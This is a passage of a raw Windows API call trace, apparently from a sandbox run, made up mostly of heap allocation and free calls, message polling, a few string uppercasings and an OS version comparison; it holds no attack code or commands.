RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0207.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0207.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0207.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.501] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0207.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.502] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.502] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.502] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0207.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0207.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.503] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0207.504] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.504] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.504] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.505] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.505] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0207.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.506] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.508] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0207.508] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.509] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.509] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.510] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.510] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.510] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.510] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.510] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0207.511] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0207.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.511] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.511] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.511] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.512] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0207.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0207.512] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.512] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0207.513] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.513] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 